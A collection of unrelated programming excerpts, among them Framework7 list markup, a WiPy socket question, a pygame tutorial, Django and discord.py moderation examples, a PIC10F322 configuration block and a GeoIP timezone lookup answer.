<f7-list-item link="#" header="Email" title="[email protected]" footer="Home" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" header="Email" title="[email protected]" footer="Work" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links, no icons
<f7-block-title>Links, no icons</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov"></f7-list-item>
<f7-list-item link="#" title="John Doe"></f7-list-item>
<f7-list-item divider title="Divider Here"></f7-list-item>
<f7-list-item link="#" title="Ivan Petrov"></f7-list-item>
<f7-list-item link="#" title="Jenna Smith"></f7-list-item>
</f7-list>
Grouped with sticky titles
<f7-block-title>Grouped with sticky titles</f7-block-title>
<f7-list>
<f7-list-group>
<f7-list-item title="A" group-title></f7-list-item>
<f7-list-item title="Aaron "></f7-list-item>
<f7-list-item title="Abbie"></f7-list-item>
<f7-list-item title="Adam"></f7-list-item>
</f7-list-group>
<f7-list-group>
<f7-list-item title="B" group-title></f7-list-item>
<f7-list-item title="Bailey"></f7-list-item>
<f7-list-item title="Barclay"></f7-list-item>
<f7-list-item title="Bartolo"></f7-list-item>
</f7-list-group>
<f7-list-group>
<f7-list-item title="C" group-title></f7-list-item>
<f7-list-item title="Caiden"></f7-list-item>
<f7-list-item title="Calvin"></f7-list-item>
<f7-list-item title="Candy"></f7-list-item>
</f7-list-group>
</f7-list>
Mixed and nested
<f7-block-title>Mixed and nested</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="No icons here"></f7-list-item>
<li>
<ul>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="No icons here"></f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
</ul>
</li>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
</f7-list>
Mixed, inset
<f7-block-title>Mixed, inset</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
<f7-block-footer>
<p>Here comes some useful information about list above</p>
</f7-block-footer>
</f7-list>
Tablet inset
<f7-block-title>Tablet inset</f7-block-title>
<f7-list tablet-inset>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-block-footer>
<p>This list block will look like "inset" only on tablets (iPad)</p>
</f7-block-footer>
</f7-list>
Media Lists
<f7-block-title>Media Lists</f7-block-title>
<f7-block>
<p>Media Lists are almost the same as Data Lists, but with a more flexible layout for visualization of more complex data, like products, services, userc, etc.</p>
</f7-block>
<f7-block-title>Songs</f7-block-title>
<f7-list media-list>
<f7-list-item
link="#"
title="Yellow Submarine"
after="$15"
subtitle="Beatles"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-1.jpg" width="80" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
after="$22"
subtitle="Queen"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-2.jpg" width="80" />
</f7-list-item>
<f7-list-item
link="#"
title="Billie Jean"
after="$16"
subtitle="Michael Jackson"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-3.jpg" width="80" />
</f7-list-item>
</f7-list>
Mail App
<f7-block-title>Mail App</f7-block-title>
<f7-list media-list>
<f7-list-item
link="#"
title="Facebook"
after="17:14"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="John Doe (via Twitter)"
after="17:11"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="Facebook"
after="16:48"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="John Doe (via Twitter)"
after="15:32"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
</f7-list>
Something more simple
<f7-block-title>Something more simple</f7-block-title>
<f7-list media-list>
<f7-list-item
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-1.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-2.jpg" width="44" />
</f7-list-item>
<f7-list-item
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-3.jpg" width="44" />
</f7-list-item>
</f7-list>
Inset
<f7-block-title>Inset</f7-block-title>
<f7-list media-list inset>
<f7-list-item
link="#"
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-4.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-5.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-6.jpg" width="44" />
</f7-list-item>
</f7-list>
|
Socket won't unbind from address when socket is terminated
After my successive failures using bluetooth to get my wipy's to communicate, I switched to using wifi and sockets. It does work, however using basically example code from the documentation I cannot soft reset and rerun the module without getting the error (from server wipy):
OSError: [Errno 112] EADDRINUSE
code used:
client:
def socket_thread(p):
sconn =True
while sconn:
# Wait for any action to happen infinitely
l = p.poll()
# Start processing the actions happened
for t in l:
# First element of the returned tuple is the socket itself
sock = t[0]
# Second element of the returned tuple is the events happened
event = t[1]
# If any error or connection drop happened close the socket
if(event & uselect.POLLERR or event & uselect.POLLHUP):
sock.close()
sconn = False
continue
# If the socket is writable then send some data
# The socket becomes writable if the connect() was successfull
if(event & uselect.POLLOUT):
# If any error occurs during sending here, do "nothing", poll() will return with error event, close the socket there
try:
sock.send("Data to send")
# We only want to send one message on this socket, in the future wait only for new incoming messages
p.modify(sock, uselect.POLLIN | uselect.POLLHUP | uselect.POLLERR)
except:
pass
# If any new data is received then get it
if(event & uselect.POLLIN):
# If any error occurs during receiving here, do "nothing", poll() will return with error event, close the socket there
try:
r = sock.recv(12)
# If recv() returns with 0 the other end closed the connection
if len(r) == 0:
sock.close()
sconn = False
continue
else:
# Do something with the received data...
print("Data received: " + str(r))
except:
pass
def makesockets():
telem = socket.socket()
telem.setblocking(False)
# Create a new poll object
p = uselect.poll()
# Register the sockets into the poll object, wait for all kind of events
p.register(telem, uselect.POLLIN | uselect.POLLOUT | uselect.POLLHUP | uselect.POLLERR)
try:
telem.connect(socket.getaddrinfo("192.168.4.1", 1235)[0][-1])
print('socket created')
except OSError as e:
if e.args[0] != uerrno.EINPROGRESS:
raise
_thread.start_new_thread(socket_thread, (p,))
server:
def client_thread(clientsocket):
# Receive maxium of 12 bytes from the client
r = clientsocket.recv(12)
# If recv() returns with 0 the other end closed the connection
if len(r) == 0:
clientsocket.close()
return
else:
# Do something wth the received data...
print("Received: {}".format(str(r)))
# Sends back some data
clientsocket.send('nice')
# Close the socket and terminate the thread
clientsocket.close()
# Set up server socket
def createsocket():
serversocket = usocket.socket(usocket.AF_INET, usocket.SOCK_STREAM)
serversocket.setsockopt(usocket.SOL_SOCKET, usocket.SO_REUSEADDR, 1)
serversocket.bind(("192.168.4.1", 1235))
serversocket.settimeout(100)
serversocket.listen(1)
(clientsocket, address) = serversocket.accept()
_thread.start_new_thread(client_thread, (clientsocket,))
I tried adding that but it was unsuccessful- however, the repl is staying open (not giving me a >>>) on my server after receiving a message, so it isn't finishing out whatever it's stuck open doing I think. I don't see any reason why it shouldn't finish out though? Doesn't the clientsocket.close() kill the thread?
You can re-initialize the socket after closing it by calling
telem= socket.socket()again. This should prevent the error you are getting
|
TensorFlow 1 version View source on GitHub
Permutes the dimensions of the input according to a given pattern.
Inherits From: Layer
tf.keras.layers.Permute( dims, **kwargs)
Useful for e.g. connecting RNNs and convnets together.
Example:
model = Sequential()
model.add(Permute((2, 1), input_shape=(10, 64)))
# now: model.output_shape == (None, 64, 10)
# note: `None` is the batch dimension
Arguments
dims Tuple of integers. Permutation pattern, does not include thesamples dimension. Indexing starts at 1.For instance, (2, 1) permutes the first and second dimensionsof the input.
Input shape:
Arbitrary. Use the keyword argument input_shape(tuple of integers, does not include the samples axis)when using this layer as the first layer in a model.
Output shape:
Same as the input shape, but with the dimensions re-ordered according to the specified pattern.
|
If you're a coder and have played any sort of video game, I'm sure that you've caught yourself wondering at least once about how creators like Sega, Treyarch or Nintendo actually put together the finished product. Hopefully this article can satisfy that inner curiosity you've had for how to make some of these games. We'll be using python, because firstly, it's a popular language and secondly, it's super easy to use. Some purists may claim that C++ is the best language for making simple games, but as I said, Python is easy to use and pygame was specifically built just for making games.
So, how do we approach making a game using python and pygame? I've divided the tutorial into 4 major steps:
Getting a hang of how to develop game foundations using a text-based game.
Learning how to use pygame.
Adding sprites.
Putting it all together to make a masterpiece.
For the purposes of this tutorial, we'll be simulating a few games overall, but primarily we'll set our goal to be making a Monopoly game. Rather than just throwing in a lot of lines of code here, I prefer giving the outline and some intuition on how to proceed. All the code used for the tutorial bit can be found here. Without further ado, let's start!
Step 0: The prerequisites
Well, the major prerequisite is being comfortable with basic python syntax. I'll be assuming that you already know python as I move along, but if you don't, there are plenty of sources to learn from. I would recommend MIT OCW's 6.0001, Introduction to Computer Science and Programming in Python, as it's a very structured way to learn the language.
There are a handful of libraries that are useful for game making in python like PyOpenGL and pyglet. However, for this tutorial, I'll be using pygame. It's convenient and fairly easy to work with. To get the pygame library, just hit:
pip3 install pygame
in the terminal or command prompt (if you use Windows).
The only other prerequisite remaining is a tool to draw your characters and backgrounds in. How fancy your designs and characters are is up to you. Personally, I'm not much of a designer and hence a tool like GIMP (Gnu Image Manipulation Program) suffices for me. You can also use Photoshop, Illustrator, Blender or even Tux Paint if that's what suits you. How you design the game is your choice, but it helps if you're thoroughly proficient with at least one design tool.
Step 1 : Rules of the Game
Before we can make our own Assassin's Creed, it's imminent that we first get comfortable with the idea of actually writing up code for a video game. You could think of this as just translating the game's principles and rules from English to python. This is where core CS principles come into play. Proficiency in object oriented programming goes a long way, but just knowing how to use objects and classes well suffices. The best way to master the skill of enforcing the game rules in python is to remove the graphics aspect entirely from your approach and learning by making text-based games. The code for this section can be found here.
Let's try making a simple business strategy game in python. I'll be making a game based off of monopoly but you're free to try whatever you want. It'll be a text-based game, so don't expect it to look fancy. Before we start coding anything, it's imperative that we first define our rules in English (or whichever language you speak in). Let's say we want this game to be played by two players on a board. The board consists of a set of "places". Each place costs a certain amount of money and has a certain "rent", which is a payment that a player has to pay when landing on a place owned by another player. The places on the board are arranged in a square loop. Each player has some money and owns a certain number of places. In a given turn, each player has a single position defined on the board. Traversal across the board is done by the roll of a die which determines how many positions on the board the player shifts by. A player starts a turn by rolling the die and moving. After moving, if the player lands on a place that has no owner, they are free to either buy the place or pass. If the player lands on a place owned by another player, they pay the owner the required amount of rent. A player loses the game when they run out of money.
Whew! It's exhausting to explain the rules of a simplified form of Monopoly in English, so you can imagine that it'd be even more challenging to code these principles into python. This is why teams of people write up the code for more complicated games like Call of Duty and StarCraft.
Let's try working on it in python. The first thing you'd need to do for that is start by defining all the game characters and mechanics. So we can define players and places (the main entities of the game by classes):
class Player:
def __init__(self):
self.money = 2000
self.position = 0
self.name = "P" + str(len(board))
self.places = []
Similarly, required functions can be implemented to enforce features of the game. I made only one function to implement a single turn for that player. A single turn consists of 2 choices : one where the player can choose to look at his/her owned places before rolling and the second where the player can choose to buy the place they land on. The same function also checks if the player has landed on a place owned by another player and pays rent accordingly.
For movement, a random number is generated and motions along the board are cyclic, meaning that a roll of 4 on the last position of the board will put the player at the 4th position.
diceno = random.randint(1,4)
print("dice shows " + str(diceno))
if (self.position + diceno < len(board)):
self.position += diceno
else:
self.position = self.position + diceno - len(board)
It's left as an exercise to you to try and implement the remaining game concepts such as buying and renting yourself. However, as mentioned before, the code is available on GitHub for reference.
I made a small-scale game with 2 players and 6 places on the board with a four sided die, but you can be as ambitious as you want with the scale of the game.
Step 2 : Working with Pygame
The next skill you need to master is getting comfy with using pygame. It's fairly simple to learn and there are plenty of things you can do with it once you're familiar with it. The best place to learn the intricacies of any python library is to refer the documentation!
In this part of the tutorial, we'll try to make a simple 2D game, where me make a little block that can move around the screen and collect coins. The best way to cover a breadth of features in pygame is to be free from the restrictions imposed by having to make a game with complicated game mechanics, so we'll be making a simple game so that we can learn how to get familiar with pygame as game mechanics are covered in step 1.
Our game will consist of a red box moving around and collecting coins. Each coin we collect will add to our score. We'll also get some music to play in the background. The code for this section is here.
As you can imagine, the first part of our code involves actually importing the pygame library and initialising it. So for that we do:
import pygame
pygame.init() # This is an initialisation function required for all pygame projects.
Following this, we're free to start setting up the global pygame-related variables. Everything on pygame typically runs on what's known as a Surface. The game screen is a surface and so are all image objects you work with. So the next step is to define a game surface for your current project:
win = pygame.display.set_mode((500,500)) # Set size in tuple as required
pygame.display.set_caption("Coin Collector")
To add some music to the game, we're going to use the pygame mixer. Here I've used an mp3 file for the Rustboro soundtrack from Pokemon Ruby. You can add whichever soundtrack you want or even compose your own. The music.play() function for the mixer class takes an argument for number of plays. If the number is set to 0, then it will play once. The value -1 implies that the track will be played indefinitely.
pygame.mixer.music.load('rustboro.mp3')
pygame.mixer.music.play(-1)
The next step is to define the participants of the game. In this case, it's just our little red box. I'll be using an object of type Player (my own class) to define the parameters of the rectangle. To draw the character, use the pygame.draw class like this:
pygame.draw.rect(win, (r, g, b), (x, y, width, height))
where (r, g, b) should be replaced with the colour of your choice. Similarly (x, y, width, height) should be replaced with the x,y position and the width and height of your rectangle.
Pro Tip : It would help to remember that pygame's coordinate system is a bit weird. The top left corner of the object is set as (0,0) instead of the centre, so when you're setting the position of any object, remember that you're most likely defining the position of the top left corner (this rule doesn't apply to drawing circles).
The most central part of the game is the main loop of the game. Once you've decided the objects that are taking part in the game, it's time to set up the main game loop.
The main game loop interacts with the user conveniently using what are known as pygame events. So when you're making the game loop, it is important that each iteration of the loop checks the pygame event list.
run = True
while (run): # You can set the game ending condition to whatever you want
for event in pygame.event.get(): #checks all pygame events.
if event.type == pygame.QUIT: #checks if the game window is closed
run = False
break
You can utilise other events such as key presses and mouse events. For moving the square around, you can look at all the keys that have been pressed like this:
pressed = pygame.key.get_pressed()
if pressed[pygame.K_UP]:
#perform action for pressing the up key
if pressed[pygame.K_DOWN]:
#perform action for down key
if pressed[pygame.K_LEFT]:
#perform action for left key
if pressed[pygame.K_RIGHT]:
#perform action for right key
Naturally this is also included in the main game loop.
The most important part of the game loop is defining a refresh function, which changes what you want to print on the screen.
def refresh():
win.fill((0, 0, 0))
p.draw() # This draws the player object that I have defined
for coin in coins: # Draws all the coins, another object I defined
if coin.collected == False:
coin.draw()
score.updatescore(p.numcollected)
pygame.display.update() # This is the most important portion. It updates the pygame screen
And voila, you're done! You can improve on this to define whatever features you want. But my simple game with a rectangle capturing coins was done with this framework and it turned out fine.
Step 3 : Designing sprites
Since I myself am not a design expert, I shall keep this section short. Sprites can be useful in many ways. Firstly, they make the aesthetic of the game more pleasing. You end up dealing with more than just squares and circles. Secondly, you can convey information to the player using the sprite. For example, you can convey whether the player is facing down or up or in any other direction. I used GIMP (Gnu Image Manipulation Program) to design my sprites, and they turned out alright.
However, software that allow more sophistication in design do exist. So do software with less intricacy. You could design in sprites in anything from Tux Paint to Adobe Illustrator, it depends on your convenience more than anything. The best place to learn GIMP is from their website.
To add your own sprites into pygame, use:
img = pygame.image.load('img-path')
Now, the image gets treated like a surface. However, you can blit this surface onto your previous surface using win.blit().
win.blit(img, coordinates) # Enter coordinates as a tuple
Conclusion : Putting it all together
Now that you're familiar with the elemental steps of game-making, which are hard-coding the rules, working with the pygame environment and adding your own sprites into the game, you're now ready to go out and make your own. If you remember the monopoly game we made in Step 1, it was actually inspired by my first game devlopment project, which is a full version of monopoly in pygame. You can check it out here.
|
I'm using 2 models in Django Rest Framework.
class Questions(models.Model):
question = models.TextField()
answer = models.TextField()
timestamp = models.DateTimeField(auto_now_add=True)
categories = models.ForeignKey(Categories, related_name="cat_questions", on_delete=models.CASCADE)
class QuestionnaireResult(models.Model):
patient_info = models.ForeignKey(PatientInfo, related_name="+", on_delete=models.CASCADE)
questions = models.ForeignKey(Questions, related_name="result_questions", on_delete=models.CASCADE)
answer_given = models.TextField()
timestamp = models.DateTimeField(auto_now_add=True)
class QuestionnaireResultSerailizer(serializers.ModelSerializer):
class Meta:
model = QuestionnaireResult
fields = '__all__'
class QuestionsSerializer(serializers.ModelSerializer):
result_questions = QuestionnaireResultSerailizer(many=True)
class Meta:
model = Questions
fields ='__all__'
http://localhost:9000/api/questions/1
{
"id": 1,
"result_questions": [
{
"id": 1,
"answer_given": "no",
"timestamp": "2017-10-01T12:28:19.770454Z",
"patient_info": 1,
"questions": 1
},
{
"id": 4,
"answer_given": "no",
"timestamp": "2017-10-01T13:13:19.658930Z",
"patient_info": 2,
"questions": 1
}
],
"question": "digestive ques 1",
"answer": "yes",
"timestamp": "2017-09-30T17:04:59.143857Z",
"categories": 1
}
http://localhost:9000/api/questions/1?patient_info=1
{
"id": 1,
"result_questions": [
{
"id": 1,
"answer_given": "no",
"timestamp": "2017-10-01T12:28:19.770454Z",
"patient_info": 1,
"questions": 1
}
],
"question": "digestive ques 1",
"answer": "yes",
"timestamp": "2017-09-30T17:04:59.143857Z",
"categories": 1
}
you can try serializermethodfield
class QuestionsSerializer(serializers.ModelSerializer):
result_questions = serializers.SerializerMethodField()
class Meta:
model = Questions
fields ='__all__'
def get_result_questions(self, obj):
qs = obj.result_questions.all()
request = self.context.get('request')
patient_info = request.GET.get('patient_info')
if patient_info:
qs = qs.filter(patient_info=patient_info)
return QuestionnaireResultSerailizer(qs, many=True).data
|
Estoy programando el algoritmo Depth first search en Python, es mi primera vez usando Python por lo que no estoy muy familiarizada con su notación. Este es el ejemplo que me han dado:
def depthFirstSearch(problem):
stack = util.Stack()
stack.push((problem.getStartState(),[]))
explored = set()
while not stack.isEmpty():
temp = stack.pop()
if problem.isGoalState(temp[0]):
return temp[1]
explored.add(temp[0])
for n in problem.getSuccessors(temp[0]):
if n[0] not in explored and n[0] not in stack.list:
stack.push((n[0], temp[1] + [n[1]]))
return []
No entiendo cuando haces pop en el stack y lo metes en la variable temporal para poder evaluarlo, eso hace referencia a solo un valor? o varios valores?.Cuando luego llama a temp[0] y temp[1] a qué se esta refiriendo ahi? Por lo que entiendo cuando esta haciendo pop tiene que ser de una cadena a la que luego accede a sus distintos valores pero no estoy segura.
Muchas gracias.
|
Container
The container layout can define the main frame of the page.
<Container>Container, used for layout.
<Header>Container header.
<Content>Container content.
<Footer>Container footer.
<Sidebar>Container sidebar.
Import
import { Container, Header, Content, Footer, Sidebar } from 'rsuite'; // or import Container from 'rsuite/lib/Container'; import Header from 'rsuite/lib/Header'; import Content from 'rsuite/lib/Content'; import Footer from 'rsuite/lib/Footer'; import Sidebar from 'rsuite/lib/Sidebar';
|
How to Make A Discord Bot - Part 6
Hey everyone as promised, I will be posting another tutorial.
Did you know my Bot is Called Moderation, and what is a Moderation Bot if can't ban or kick people. Today, we will be going over banning, kicking and unbanning.
Firstly, we need to know the differences between these 3 operations.
Banning has 2 parts to it, first is to remove the user from the server and second is to block him from ever joining back, even if he has a valid invite link.
Kicking on the other hand is much simpler, it just removes the user from the server, if he has a valid invite link, he can join back.
To unban someone, is to remove that blockage that was previously there to prevent them from joining again. Now, if he has a valid invite link, he can join back.
Banning and Kicking
Now let's get into the code. To be honest, you yourself will be surprised at how short it is.
@client.command()
@commands.has_role('Moderators')
async def kick(ctx,member:discord.Member,*,reason=None):
await member.kick(reason=reason)
#A Ban is pretty much the same
@client.command()
@commands.has_role('Moderators')
async def ban(ctx,member:discord.Member,*,reason=None):
await member.ban(reason=reason)
Something new here is the 2 Argument, we actually take in member as an argument but the colon sign gives it a special data type, in this case it's a discord.Member class which is simply accepting member as a member object. Lastly, we add a keyword argument for reason because the in-built ban function has a reason parameter, if no extra reasons were given it would be None. You can find the reasons in the audit log of your server.
I also added the command check so only moderators can run this command.
This is how the command will be typed like:
Take note that the Member name is highlighted blue because it is a member object.
Unbanning
This part gets slightly trickier. You can't just unban someone by mentioning them because they are not in your server to mention. If you don't get it, you can just try mentioning a banned member, it won't turn blue.
Instead, we have to get them to manually type the players whole Discord Tag and we will break it up into the name and discriminator.
For example: Fishball_Noodles is my Name, and #7209 is my Discriminator.
We will then compare it to the ban entries (aka list of banned players).
This is how it looks like:
@client.command()
@commands.has_role('Moderators')
async def unban(ctx,*,member)
BanList = await ctx.guild.bans()
MemberName, MemberDiscrim = member.split('#')
for BanEntry in BanList:
user = BanEntry.user
if (MemberName,MemberDiscrim) == (user.name,user.discriminator):
await ctx.guild.unban(user)
await ctx.send(f'{user.mention} has been Unbanned')
return
Basically what we did above was to see if the input member matched both the name and discriminator of every member in the ban list. If it did, it will unban him.
Return will stop the code from checking anymore.
Ok that pretty much covers up banning and kicking, this might be useful if you don't want to give them full administrator role to change your server but just to kick and ban people.
Hope this tutorial was helpful, see you tomorrow for another one.
Once again if you faced any problems regarding any of my tutorials, please feel free to ask in the comments section below.
|
Mi objective es dibujar algunos polígonos en una imagen en negro de modo que el tamaño total de la imagen resultante sea lo más pequeño posible.
Así que leí un artículo en wiki sobre colores indexados ( enlace ) y me parece que es una buena opción para mí (ya que debería admitir solo un color negro y los otros 5, es decir, 6 colores en total) y el png imagen png debería admitir Modo ‘P’ (es decir, imágenes de paleta ).
Esa es la razón por la que creé este fragmento de código para ver qué tamaño de imagen obtendré para 6 colores y 1224x1024 imágenes:
from PIL import Image, ImageDraw # Create a black 1224x1024 image img = Image.new('P', (1224, 1024)) img.putpalette([ 0, 0, 0, # black background 236, 98, 98, # red color 236, 98, 97, 236, 98, 96, 236, 98, 95, 236, 98, 94, ]) draw = ImageDraw.Draw(img) # Draw a random red polygon at the top left corner of the image draw.polygon(xy=list(1,1,2,2,3,3,4,4), fill=1) del draw img.save('1.png', format='PNG')
El tamaño de la imagen resultante es de 768 bytes, lo que me parece demasiado.
¿Hay algo que pueda corregir en mi código para reducir aún más el tamaño de la imagen resultante?
768 bytes no me parece razonable representar una imagen de 1.2 megapíxeles. Puedes intentar ejecutar el archivo producido por PIL a través de pngcrush esta manera para ver si se pueden afeitar unos cuantos bytes:
pngcrush input.png result.png
Si realmente solo desea dibujar unos pocos polígonos de color sólido sobre un fondo negro, sugeriría que busque un formato vectorial, como el ejemplo SVG aquí, en lugar del formato raster PNG et al .
También puede usar rsvg para renderizar imágenes SVG a PNG si lo necesita, pero ni su aplicación ni la razón por la que necesita imágenes tan pequeñas queda claro en su pregunta, así que no tengo idea si esa es una opción para usted.
Aquí hay una imagen SVG de 300 bytes con un fondo negro, 2 rectangularjs y un polígono como una forma de estrella roja en la parte superior izquierda:
Puedes cargar un SVG en una matriz de Numpy como esta:
#!/usr/bin/env python3 import cairosvg import io from PIL import Image def svgRead(filename): """Load an SVG file and return image in Numpy array""" # Make memory buffer mem = io.BytesIO() # Convert SVG to PNG in memory cairosvg.svg2png(url=filename, write_to=mem) # Convert PNG to Numpy array return np.array(Image.open(mem)) # Read SVG file into Numpy array res = svgRead('image.svg')
Si está empeñado en hacer que los archivos sean aún más pequeños, al precio de la compatibilidad reducida con otros visores de imágenes, podría diseñar su propio formato muy simple algo parecido a SVG, de modo que podría almacenar la imagen representada por el ejemplo de SVG que proporcioné. como un simple archivo de texto:
b,1224,1024,#00000 r,100,200,100,400,#0000ff r,800,280,100,200,#00ff00 p,9.9,1.1,3.3,21.78,19.8,8.58,0,8.58,16.5,21.78,#ff0000
Y eso lo hago 127 bytes.
Puedes ver tus archivos SVG al cargarlos en cualquier navegador web, o convertir uno en un PNG con ImageMagick en Terminal como esto:
magick input.svg result.png
|
So, you just made your first PIC10F322 XC8 program. Uploaded to the chip and….. Nothing…
Chances are – did you setup the Device Configuration Bits?
Here is the setup I generally use – put this at the top of your main.c file or in a header, call it in the main.c file. This will get you up and going quickly.
#pragma config FOSC = INTOSC // Oscillator Selection
#pragma config BOREN = ON // Brown-out Reset
#pragma config WDTE = OFF // Watchdog Timer
#pragma config PWRTE = ON // Power-up Timer
#pragma config MCLRE = OFF // MCLR Pin Function Select bit->MCLR pin function is digital input, MCLR internally tied to VDD
#pragma config CP = OFF // Code Protection
#pragma config LVP = OFF // Low-Voltage Programming
#pragma config LPBOR = ON // Brown-out Reset Selection bits
#pragma config BORV = LO // Brown-out Reset Voltage Selection
#pragma config WRT = OFF // Flash Memory Self-Write Protection
|
There is no protocol as such but you could do a GeoIP lookup to get your approximate location and map the location to a timezone.
MaxMind offers a GeoIP database that is accessible via various methods, see http://dev.maxmind.com. You can even get the data in a CSV file and store locally but given that you are on an embedded device I suspect you are low on storage and might prefer to just do an online lookup. They have a convenient API that can do a lookup on the requestors IP address, so you don't need to use any other method to find your external address. In addition the returned data includes timezone information so it appears you can get all you need with a single HTTP call. See https://www.maxmind.com/en/locate-my-ip-address
I put together a few lines of Python to show how this could work:
#!/usr/bin/env python
import urllib, json
url = "https://js.maxmind.com/geoip/v2.1/city/me?referrer=https%3A%2F%2Fwww.maxmind.com"
response = urllib.urlopen(url)
data = json.loads(response.read())
print data['location']['time_zone']
# to pretty print all returned data
#print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
And when run:
kll $ python ip2tz.py
Europe/Stockholm
It would probably be wise to cache the result so that you can get your timezone even if your Internet connection is down.
|
ExtUtils::MakeMaker - Create a module Makefile
use ExtUtils::MakeMaker;
WriteMakefile(
